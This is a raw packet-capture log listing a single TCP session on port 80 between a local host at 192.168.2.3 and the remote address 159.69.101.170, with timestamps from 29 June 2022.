Jun 29, 2022 23:12:20.536986113 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.536994934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537015915 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537024021 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537036896 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537038088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537059069 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537069082 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537079096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537082911 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537102938 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537102938 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537118912 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537126064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537156105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537154913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537178040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537178993 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537197113 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537205935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537213087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537229061 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537250042 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537254095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537266970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537271976 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537292957 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537307024 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537314892 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537334919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537367105 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537385941 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537544966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537566900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537585974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537595987 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537606955 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537616014 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537630081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537633896 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537652969 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537662029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537677050 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537678957 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537695885 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537703991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537719011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537720919 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537741899 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537741899 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537758112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537765980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537787914 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537791967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537808895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537810087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537831068 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537832022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537854910 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537870884 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537877083 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.537879944 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537894011 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.537929058 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538151026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538216114 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538697958 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538719893 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538738966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538759947 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538759947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538783073 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538784981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538805008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538821936 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538826942 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538849115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538862944 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538870096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538891077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538902044 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538913012 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538913965 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538934946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538950920 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538955927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538963079 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.538979053 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.538979053 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539000988 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539005041 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539022923 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539024115 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539057970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539069891 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539681911 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539717913 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539737940 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539747953 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539758921 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539782047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539791107 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539803982 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539814949 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539827108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539844990 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539849043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539870024 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539874077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539896965 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539897919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539920092 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539930105 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539940119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539942980 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539962053 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539966106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.539982080 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.539988041 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540003061 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540009975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540030956 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540034056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540047884 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540055037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540069103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540077925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540098906 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540102959 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540117025 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540122032 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540132046 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540143967 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540169001 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540179968 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540186882 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540210009 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540236950 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540241957 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540250063 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540263891 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540286064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540288925 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540302038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540307999 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540318012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540353060 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540374041 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540375948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540389061 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540396929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540410995 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540419102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540440083 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.540446043 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540458918 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.540473938 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543376923 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543400049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543431044 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543451071 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543453932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543472052 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543474913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543497086 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543517113 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543535948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543538094 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543560982 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.543587923 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.543617010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544563055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544580936 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544645071 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544645071 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544668913 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544689894 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544702053 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544712067 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544733047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544735909 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544751883 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544759035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544770002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544795036 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544795990 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544806004 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544820070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544841051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544845104 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544862986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544872046 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544887066 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544888973 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544909000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544912100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544928074 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544934988 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544958115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.544961929 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544974089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.544981003 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545002937 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545010090 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545022011 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545022011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545047998 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545051098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545063019 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545069933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545092106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545099020 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545113087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545113087 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545137882 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545139074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545150042 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545159101 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545181990 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545188904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545202971 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545207024 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545227051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545229912 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545250893 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545253992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545268059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545277119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545296907 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545305967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545317888 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545321941 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545335054 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545352936 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545371056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545380116 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545393944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545394897 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545411110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545417070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545428991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545439005 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545460939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545464039 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545475960 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545481920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545506954 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.545521021 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545532942 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545541048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.545780897 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546092987 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546113968 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546134949 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546148062 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546154976 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546163082 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546184063 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546191931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546204090 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546215057 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546236992 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546238899 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546248913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546255112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546262026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546281099 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546288013 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546298981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546312094 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546330929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546334982 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546354055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546360970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546376944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546380997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546400070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546406984 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546422005 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546422005 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546446085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546453953 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546468019 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546468019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546482086 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546490908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546513081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546518087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546531916 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546536922 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546547890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546557903 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546576977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546586990 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546600103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546617031 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546648026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546669960 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546693087 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546699047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546710968 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546716928 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546731949 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546740055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546761036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546766043 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546783924 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546785116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546802998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546807051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546821117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546832085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546833038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546839952 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546854973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546875000 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546895027 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546910048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546916008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546937943 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546940088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546953917 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.546962023 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546983957 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.546988010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.547000885 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.547005892 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.547033072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.547054052 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.547059059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.547075987 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.547080994 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.547097921 CEST	80	49792	159.69.101.170	192.168.2.3
